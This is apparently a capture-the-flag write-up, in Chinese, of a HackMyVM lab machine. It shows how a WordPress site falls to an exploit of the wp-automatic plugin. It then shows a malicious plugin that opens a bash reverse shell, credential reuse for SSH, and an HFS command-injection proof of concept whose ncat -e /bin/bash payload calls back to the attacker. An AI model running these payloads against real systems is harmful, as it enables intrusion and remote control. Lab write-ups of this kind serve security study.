信息收集

服务探测

❯ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.236  08:00:27:0e:8d:17       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f5:54:75       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.027 seconds (126.30 hosts/sec). 4 responded
❯ export ip=192.168.60.236
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.236:22
Open 192.168.60.236:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-09 16:31 CST
Initiating ARP Ping Scan at 16:31
Scanning 192.168.60.236 [1 port]
Completed ARP Ping Scan at 16:31, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:31
Completed Parallel DNS resolution of 1 host. at 16:31, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:31
Scanning 192.168.60.236 [2 ports]
Discovered open port 22/tcp on 192.168.60.236
Discovered open port 80/tcp on 192.168.60.236
Completed SYN Stealth Scan at 16:31, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.236
Host is up, received arp-response (0.00031s latency).
Scanned at 2025-03-09 16:31:16 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:0E:8D:17 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

枚举目录，发现是个wordpress站点

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.236
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 301) [Size: 0] [--> http://192.168.60.236/]
/wp-content           (Status: 301) [Size: 321] [--> http://192.168.60.236/wp-content/]
/wp-login.php         (Status: 200) [Size: 3931]
/license.txt          (Status: 200) [Size: 19915]
/wp-includes          (Status: 301) [Size: 322] [--> http://192.168.60.236/wp-includes/]
/readme.html          (Status: 200) [Size: 7409]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 319] [--> http://192.168.60.236/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://mamushka.hmv/wp-login.php?action=register]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

浏览器访问80端口，发现存在域名

编辑一下hosts

1 2	❯ echo "$ip mamushka.hmv"\|sudo tee -a /etc/hosts 192.168.60.236 mamushka.hmv

利用wpscan扫一下

❯ wpscan --url http://mamushka.hmv -e u,ap --plugins-detection aggressive --api-token "vIrpyD0oybubw9Q12LG1MH5vyWekAer6SoesmdarpVo"
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://mamushka.hmv/ [192.168.60.236]
[+] Started: Sun Mar  9 17:48:41 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.61 (Debian)
 |  - X-Powered-By: PHP/8.2.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://mamushka.hmv/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://mamushka.hmv/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://mamushka.hmv/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.2 identified (Latest, released on 2025-02-11).
 | Found By: Query Parameter In Install Page (Aggressive Detection)
 |  - http://mamushka.hmv/wp-includes/css/dashicons.min.css?ver=6.7.2
 |  - http://mamushka.hmv/wp-includes/css/buttons.min.css?ver=6.7.2
 |  - http://mamushka.hmv/wp-admin/css/forms.min.css?ver=6.7.2
 |  - http://mamushka.hmv/wp-admin/css/l10n.min.css?ver=6.7.2
 |  - http://mamushka.hmv/wp-admin/css/install.min.css?ver=6.7.2

[+] WordPress theme in use: twentytwentyfour
 | Location: http://mamushka.hmv/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-11-13T00:00:00.000Z
 | Readme: http://mamushka.hmv/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.3
 | Style URL: http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:02:35 <================================================================> (109390 / 109390) 100.00% Time: 00:02:35
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://mamushka.hmv/wp-content/plugins/akismet/
 | Latest Version: 5.3.7
 | Last Updated: 2025-02-14T18:49:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/akismet/, status: 403
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
 |     Fixed in: 3.1.5
 |     References:
 |      - https://wpscan.com/vulnerability/1a2f3094-5970-4251-9ed0-ec595a0cd26c
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357
 |      - http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
 |      - https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
 |
 | The version could not be determined.

[+] meta-generator-and-version-info-remover
 | Location: http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/
 | Latest Version: 16.0 (up to date)
 | Last Updated: 2024-11-20T05:03:00.000Z
 | Readme: http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/, status: 403
 |
 | Version: 16.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt

[+] ultimate-member
 | Location: http://mamushka.hmv/wp-content/plugins/ultimate-member/
 | Last Updated: 2025-03-03T17:36:00.000Z
 | Readme: http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
 | [!] The version is out of date, the latest version is 2.10.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/, status: 403
 |
 | [!] 7 vulnerabilities identified:
 |
 | [!] Title: Ultimate Member < 2.8.7 - Cross-Site Request Forgery to Membership Status Change
 |     Fixed in: 2.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/2b670a80-2682-4b7f-a549-64a35345e630
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8520
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/7ffddc03-d4ae-460e-972a-98804d947d09
 |
 | [!] Title: Ultimate Member < 2.8.7 - Authenticated (Contributor+) Stored Cross-Site Scripting
 |     Fixed in: 2.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/7488f9f3-03ea-4f4e-b5fb-c0dd02c5bb59
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8519
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/9e394bb2-d505-4bf1-b672-fea3504bf936
 |
 | [!] Title: Ultimate Member < 2.9.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Profile Picture Update
 |     Fixed in: 2.9.0
 |     References:
 |      - https://wpscan.com/vulnerability/54a53b30-4249-4559-85f8-7aeac2dc0df2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10528
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/0a9793b6-2186-46ef-b204-d8f8f154ebf3
 |
 | [!] Title: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin < 2.9.2 - Information Exposure
 |     Fixed in: 2.9.2
 |     References:
 |      - https://wpscan.com/vulnerability/cb9c5ef8-51f8-4a46-ae56-23302c5980aa
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0318
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ee149bf-ffa3-4906-8be2-9c3c40b28287
 |
 | [!] Title: Ultimate Member < 2.9.2 - Unauthenticated SQL Injection
 |     Fixed in: 2.9.2
 |     References:
 |      - https://wpscan.com/vulnerability/31ef60db-4847-4623-a194-8722e668e6ab
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0308
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/e3e5bb98-2652-499a-b8cd-4ebfe1c1d890
 |
 | [!] Title: Ultimate Member < 2.10.0 - Authenticated SQL Injection
 |     Fixed in: 2.10.0
 |     References:
 |      - https://wpscan.com/vulnerability/90b5192a-ceee-4612-8e21-2341bae29cad
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12276
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/846f9828-2f1f-4d08-abfb-909b8d634d8a
 |
 | [!] Title: Ultimate Member < 2.10.1 - Unauthenticated SQLi
 |     Fixed in: 2.10.1
 |     References:
 |      - https://wpscan.com/vulnerability/1d39ff72-1178-4812-be55-9bf4b58bbbb6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1702
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/34adbae5-d615-4f8d-a845-6741d897f06c
 |
 | Version: 2.8.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt

[+] wp-automatic
 | Location: http://mamushka.hmv/wp-content/plugins/wp-automatic/
 | Latest Version: 3.109.2
 | Last Updated: 2025-03-09T10:54:44.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/wp-automatic/, status: 200
 |
 | [!] 7 vulnerabilities identified:
 |
 | [!] Title: Automatic 2.0.3 - csv.php q Parameter SQL Injection
 |     Fixed in: 2.0.4
 |     References:
 |      - https://wpscan.com/vulnerability/dadc99ca-54ee-42b4-b247-79a47b884f03
 |      - https://www.exploit-db.com/exploits/19187/
 |      - https://packetstormsecurity.com/files/113763/
 |
 | [!] Title: WordPress Automatic < 3.53.3 - Unauthenticated Arbitrary Options Update
 |     Fixed in: 3.53.3
 |     References:
 |      - https://wpscan.com/vulnerability/4e5202b8-7317-4a10-b9f3-fd6999192e15
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4374
 |      - https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/
 |
 | [!] Title: Automatic < 3.92.1 - Cross-Site Request Forgery to Privilege Escalation
 |     Fixed in: 3.92.1
 |     References:
 |      - https://wpscan.com/vulnerability/fa2f3687-7a5f-4781-8284-6fbea7fafd0e
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27955
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/12adf619-4be8-4ecf-8f67-284fc44d87d0
 |
 | [!] Title: Automatic < 3.92.1 - Unauthenticated Arbitrary File Download and Server-Side Request Forgery
 |     Fixed in: 3.92.1
 |     References:
 |      - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/620e8931-64f0-4d9c-9a4c-1f5a703845ff
 |
 | [!] Title: Automatic < 3.92.1 - Unauthenticated SQL Injection
 |     Fixed in: 3.92.1
 |     References:
 |      - https://wpscan.com/vulnerability/53a51e79-a216-4ca3-ac2d-57098fd2ebb5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27956
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/a8b319be-f312-4d02-840f-e2a91c16b67a
 |
 | [!] Title: WordPress Automatic Plugin < 3.93.0 Cross-Site Request Forgery
 |     Fixed in: 3.93.0
 |     References:
 |      - https://wpscan.com/vulnerability/e5d0dcec-41a7-40ae-b9ce-f839de9c28b8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32693
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/6231e47e-2120-4746-97c1-2aa80aa18f4e
 |
 | [!] Title: WordPress Automatic < 3.95.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via autoplay Parameter
 |     Fixed in: 3.95.0
 |     References:
 |      - https://wpscan.com/vulnerability/d0198310-b323-476a-adf8-10504383ce1c
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4849
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/4be58bfa-d489-45f5-9169-db8bab718175
 |
 | The version could not be determined.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 6
 | Requests Remaining: 16

[+] Finished: Sun Mar  9 17:51:32 2025
[+] Requests Done: 109475
[+] Cached Requests: 22
[+] Data Sent: 29.291 MB
[+] Data Received: 15.241 MB
[+] Memory used: 465.801 MB
[+] Elapsed time: 00:02:50

发现ultimate-member插件的版本低于最新版，而且存在很多版本漏洞

不过我搜索了一下，没有现有的POC可以利用

但是还有一个Automatic插件含有SQL Injection漏洞

Msfconsole 利用

在metasploit中存在现成的POC可以利用

最终的预期是反弹shell的，不过当上传payload的时候会失败，因为新版的wordpress是不允许上传php文件

❯ msfconsole
Metasploit tip: View a module's description using info, or the enhanced
version in your browser with info -d


 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|


       =[ metasploit v6.4.38-dev                          ]
+ -- --=[ 2467 exploits - 1273 auxiliary - 431 post       ]
+ -- --=[ 1478 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search wp_automatic

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  auxiliary/admin/http/wp_automatic_plugin_privesc  2021-09-06       normal     Yes    WordPress Plugin Automatic Config Change to RCE
   1  exploit/multi/http/wp_automatic_sqli_to_rce       2024-03-13       excellent  Yes    WordPress wp-automatic Plugin SQLi Admin Creation
   2    \_ target: PHP In-Memory                        .                .          .      .
   3    \_ target: Unix/Linux Command Shell             .                .          .      .
   4    \_ target: Windows Command Shell                .                .          .      .


Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_automatic_sqli_to_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'

msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > show options

Module options (exploit/multi/http/wp_automatic_sqli_to_rce):

   Name       Current Setting            Required  Description
   ----       ---------------            --------  -----------
   EMAIL      [email protected]  no        Email for the new user
   PASSWORD   dhnPDH8ZWTb6v5k            no        Password for the new user
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit
                                                   .html
   RPORT      80                         yes       The target port (TCP)
   SSL        false                      no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                          yes       The base path to the wordpress application
   USERNAME   dorian.bartell             no        Username to create
   VHOST                                 no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.60.100   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP In-Memory



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set RHOSTS 192.168.60.236
RHOSTS => 192.168.60.236
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > exploit

[*] Started reverse TCP handler on 192.168.60.100:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting SQLi test to verify vulnerability...
[+] The target is vulnerable. Target is vulnerable to SQLi!
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/fixflex/port.php...
[!] This exploit may require manual cleanup of 'port.php' on the target
[!] This exploit may require manual cleanup of 'fixflex.php' on the target
[!] This exploit may require manual cleanup of '../fixflex' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) >

不过好在他成功创建了管理员账户dorian.bartell:dhnPDH8ZWTb6v5k

尝试登录一下，可以成功登录

上传恶意插件

我们可以尝试通过添加插件的访问获取反弹shell

[Wordpress - HackTricks](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/wordpress.html?highlight=wordpress plugins#plugin-rce)

wetw0rk/malicious-wordpress-plugin: Simply generates a wordpress plugin that will grant you a reverse shell once uploaded. I recommend installing Kali Linux, as msfvenom is used to generate the payload.

或者可以尝试手动写一个恶意php，压缩成zip文件即可

❯ vi rev.php
<?php
/**
 * Plugin Name: GetRev
 * Version: 10.8.1
 * Author: PwnedSauce
 * Author URI: http://PwnedSauce.com
 * License: GPL2
 */
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.60.100/4444 0>&1'")
?>
❯ zip rev.zip rev.php
  adding: rev.php (deflated 14%)

用户提权

上传后激活GetRev插件，监听端口

不过反弹的shell后发现当前环境是在docker中

查看env的环境变量中发现wordpress数据库的账户凭证matrioska:Fukurokuju

❯ pwncat-cs -lp 4444
[19:01:47] Welcome to pwncat 🐈!                           __main__.py:164
[19:03:30] received connection from 192.168.60.236:58630        bind.py:84
[19:03:31] 192.168.60.236:58630: registered new host w/ db  manager.py:957
(local) pwncat$
(remote) www-data@3ed5ddfe0e0c:/var/www/html/wp-admin$ env
HISTCONTROL=ignorespace
HOSTNAME=3ed5ddfe0e0c
PHP_VERSION=8.2.22
APACHE_CONFDIR=/etc/apache2
PHP_INI_DIR=/usr/local/etc/php
GPG_KEYS=39B641343D8C104B2B146DC3F9C39DC0B9698544 E60913E4DF209907D8E30D96659A97C9CF2A795A 1198C0117593497A5EC5C199286AF1F9897469DC
PHP_LDFLAGS=-Wl,-O1 -pie
PWD=/var/www/html/wp-admin
APACHE_LOG_DIR=/var/log/apache2
LANG=C
PHP_SHA256=8566229bc88ad1f4aadc10700ab5fbcec81587c748999d985f11cf3b745462df
APACHE_PID_FILE=/var/run/apache2/apache2.pid
WORDPRESS_DB_HOST=db
PHPIZE_DEPS=autoconf            dpkg-dev                file            g++             gcc             libc-dev                make            pkg-config            re2c
TERM=screen-256color
PHP_URL=https://www.php.net/distributions/php-8.2.22.tar.xz
APACHE_RUN_GROUP=www-data
APACHE_LOCK_DIR=/var/lock/apache2
SHLVL=3
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
WORDPRESS_DB_PASSWORD=Fukurokuju
APACHE_RUN_DIR=/var/run/apache2
PS1=$(command printf "\[\033[01;31m\](remote)\[\033[0m\] \[\033[01;33m\]$(whoami)@$(hostname)\[\033[0m\]:\[\033[1;36m\]$PWD\[\033[0m\]\$ ")
APACHE_ENVVARS=/etc/apache2/envvars
APACHE_RUN_USER=www-data
WORDPRESS_DB_USER=matrioska
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
WORDPRESS_DB_NAME=wordpressdb
PHP_ASC_URL=https://www.php.net/distributions/php-8.2.22.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
_=/usr/bin/env

猜测此凭证为ssh凭证，尝试连接

结果连接不上，通过靶机名称对比后发现matrioska少了个h

再次连接，拿到user flag

❯ ssh matrioshka@$ip
[email protected]'s password:
Linux matrioshka 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Aug 22 19:12:21 2024 from 10.0.2.8
matrioshka@matrioshka:~$ cat user.txt
c8129b0390452d8378535cff76e0dde8

靶机内存在多张网卡，而且存在很多本地端口开放

matrioshka@matrioshka:/tmp$ ss -luntp
Netid         State          Recv-Q          Send-Q                   Local Address:Port                    Peer Address:Port         Process
udp           UNCONN         0               0                              0.0.0.0:68                           0.0.0.0:*
tcp           LISTEN         0               4096                         127.0.0.1:44803                        0.0.0.0:*
tcp           LISTEN         0               4096                         127.0.0.1:8080                         0.0.0.0:*
tcp           LISTEN         0               4096                         127.0.0.1:9090                         0.0.0.0:*
tcp           LISTEN         0               128                            0.0.0.0:22                           0.0.0.0:*
tcp           LISTEN         0               128                               [::]:22                              [::]:*
tcp           LISTEN         0               511                                  *:80                                 *:*

通过Ligolo内网穿透后

❯ sudo ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

ligolo-ng » interface_create --name "ligolo"
INFO[0006] Creating a new "ligolo" interface...
INFO[0006] Interface created!
ligolo-ng » INFO[0016] Agent joined.                                 id=48a35bd8-3cec-4c94-b2f6-e23935c72802 name=matrioshka@matrioshka remote="192.168.60.236:53074"
ligolo-ng » session
? Specify a session : 1 - matrioshka@matrioshka - 192.168.60.236:53074 - 48a35bd8-3cec-4c94-b2f6-e23935c72802
[Agent : matrioshka@matrioshka] » tunnel_start --tun ligolo
[Agent : matrioshka@matrioshka] » INFO[0026] Starting tunnel to matrioshka@matrioshka (48a35bd8-3cec-4c94-b2f6-e23935c72802)
----------------------------------------------------------
##靶机内执行
matrioshka@matrioshka:/tmp$ ./agent -connect 192.168.60.100:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established                        addr="192.168.60.100:11601"

POC利用

访问172.19.0.2，得到一个文件服务器

尝试利用弱密码去登录，发现凭证就是admin:admin

得知文件服务器是HFS 0.52.9版本

搜寻一下有无版本漏洞

jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS: Unauthenticated RCE Flaw in Rejetto HTTP File Server (CVE-2024-23692)

truonghuuphuc/CVE-2024-39943-Poc: CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

在CVE-2024-23692的POC虽然可以监测到含有漏洞，但无法成功利用

然而利用CVE-2024-39943可以通过身份验证后执行任意命令

通过抓到cookie后反弹shell，POC作者挺贴心，还有演示视频，好评🤣

利用一下POC

❯ git clone https://github.com/truonghuuphuc/CVE-2024-39943-Poc.git
Cloning into 'CVE-2024-39943-Poc'...
remote: Enumerating objects: 70, done.
remote: Counting objects: 100% (70/70), done.
remote: Compressing objects: 100% (68/68), done.
remote: Total 70 (delta 30), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (70/70), 22.50 MiB | 6.83 MiB/s, done.
Resolving deltas: 100% (30/30), done.
❯ cd CVE-2024-39943-Poc
❯ python poc_user_admin.py
Url: http://172.19.0.2/
Cookie: hfs_http=eyJ1c2VybmFtZSI6ImFkbWluIiwiaXAiOiIxNzIuMTkuMC4xIiwiX2V4cGlyZSI6MTc0MTYxMTE1OTkwNywiX21heEFnZSI6ODY0MDAwMDB9; hfs_http.sig=rPgYkWCMMtmT6V70MBZcfLc8ds0
Ip: 172.19.0.1
Port: 4444
Step 1 add vfs
Step 2 set permission vfs
Step 3 create folder
Step 4 execute payload

监听端口，然而并不触发

1 2	matrioshka@matrioshka:/tmp$ busybox nc -lp 4444 id

看一下POC，分析一下脚本实现逻辑，实际上作者写的也很清晰

添加虚拟文件系统，然后文件夹是映射到本地目录的/tmp下

最后一部其实就是访问一下~/api/get_ls?path=/tmp/poc";python3 -c "import os;import base64;os.system(base64.b64decode(\''+base64.b64encode(command).decode('utf-8')+"这个文件夹

就是命令拼接后实现RCE

import requests as req
import base64

url = input("Url: ")
cookie = input("Cookie: ")
ip = input("Ip: ")
port = input("Port: ")

headers = {"x-hfs-anti-csrf":"1","Cookie":cookie}

print("Step 1 add vfs")
step1 = req.post(url+"~/api/add_vfs", headers=headers, json={"parent":"/","source":"/tmp"})

print("Step 2 set permission vfs")
step2 = req.post(url+"~/api/set_vfs", headers=headers, json={"uri":"/tmp/","props":{"can_see":None,"can_read":None,"can_list":None,"can_upload":"*","can_delete":None,"can_archive":None,"source":"/tmp","name":"tmp","type":"folder","masks":None}})

print("Step 3 create folder")
command = "ncat {0} {1} -e /bin/bash".format(ip,port)
command = command.encode('utf-8')
payload = 'poc";python3 -c "import os;import base64;os.system(base64.b64decode(\''+base64.b64encode(command).decode('utf-8')+"'))"
step3 = req.post(url+"~/api/create_folder", headers=headers, json={"uri":"/tmp/","name":payload})

print("Step 4 execute payload")
